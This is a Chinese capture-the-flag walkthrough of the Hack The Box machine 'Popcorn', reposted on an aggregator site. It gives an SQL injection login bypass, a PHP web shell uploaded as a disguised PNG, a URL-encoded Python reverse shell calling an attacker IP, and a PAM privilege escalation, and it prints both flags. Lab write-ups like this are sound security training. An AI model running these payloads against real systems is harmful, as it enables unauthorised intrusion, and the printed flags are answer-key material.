您的位置:首页 > 科技 > 能源 > [Meachines] [Medium] Popcorn SQLI+Upload File+PAM权限提升

[Meachines] [Medium] Popcorn SQLI+Upload File+PAM权限提升

2024/12/22 19:45:17 来源:https://blog.csdn.net/qq_51886509/article/details/141267896  浏览:    关键词:[Meachines] [Medium] Popcorn SQLI+Upload File+PAM权限提升

信息收集

IP AddressOpening Ports
10.10.10.6TCP:22,80

$ nmap -p- 10.10.10.6 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp    open     http        Apache httpd 2.2.12
|_http-title: Did not follow redirect to http://popcorn.htb/
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: Host: popcorn.hackthebox.gr; OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLI & 文件上传

# echo '10.10.10.6 popcorn.htb'>>/etc/hosts

$ feroxbuster --url http://popcorn.htb/

image.png

http://popcorn.htb/torrent/login.php

image-1.png

username:admin' or '1'='1
password:xxx

image-2.png

http://popcorn.htb/torrent/torrents.php?mode=upload

$ wget https://cdimage.kali.org/kali-2024.2/kali-linux-2024.2-installer-amd64.iso.torrent -O 1.torrent

image-3.png

http://popcorn.htb/torrent/torrents.php?mode=details&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc

image-4.png

popcorn.htb/torrent/edit.php?mode=edit&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc

image-5.png

POST /torrent/upload_file.php?mode=upload&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc HTTP/1.1
Host: popcorn.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------356668434211973508953699136894
Content-Length: 378901
Origin: http://popcorn.htb
Connection: close
Referer: http://popcorn.htb/torrent/edit.php?mode=edit&id=15e47da8c58f93e7bd55a60ef02d4bf05645becc
Cookie: /torrent/login.php=; saveit_0=1; saveit_1=0; /torrent/torrents.php=; /torrent/=; /torrent/index.php=; /torrent/torrents.phpfirsttimeload=0; PHPSESSID=8d214a4d51e6d9b98fb3d5ea8cec6e45
Upgrade-Insecure-Requests: 1-----------------------------356668434211973508953699136894
Content-Disposition: form-data; name="file"; filename="Screenshot 2024-08-16 182829.png.php"
Content-Type: image/png<?php system($_GET[1]);phpinfo();?>
-----------------------------356668434211973508953699136894
Content-Disposition: form-data; name="submit"Submit Screenshot
-----------------------------356668434211973508953699136894--

image-6.png

http://popcorn.htb/torrent/upload/

image-7.png

http://popcorn.htb/torrent/upload/15e47da8c58f93e7bd55a60ef02d4bf05645becc.php?1=dir

image-8.png

$ curl 'http://popcorn.htb/torrent/upload/15e47da8c58f93e7bd55a60ef02d4bf05645becc.php?1=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.16.24%22%2C10032%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27'

image-9.png

User.txt

5cdfb68827912b249896490a60bf420c

权限提升

$ uname -a

image-10.png

使用 ls -lAR /home/george 命令显示了 .cache 目录下一个不常见的文件 motd.legal-displayed。经过一些研究,发现 Exploit-DB 14339 提到 PAM 1.1.0 存在一个文件篡改的特权升级漏洞。通过这个漏洞,可以在目标机器上执行脚本以获得 root 权限。请注意,需要一个交互式的 shell,可以通过在非交互式 shell 中运行命令 python -c ‘import pty; pty.spawn(“/bin/sh”)’ 来获取。可以从 /root/root.txt 获取 root 标志。

motd.legal-displayed 是 PAM(Pluggable Authentication Modules)相关的一个文件,用于存储关于“Message of the Day”(MOTD,登录欢迎信息)的法律声明或其他类似信息。在某些 PAM 配置中,它可能用于记录用户是否已经查看过这些信息,以便在用户每次登录时进行相关的提示或处理。

image-11.png

https://www.exploit-db.com/exploits/14339

image-12.png

$ chmod +x exp.sh

$ ./exp.sh

image-13.png

Root.txt

d87c02b4781a36f55ea99c8c8fbf4d20

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com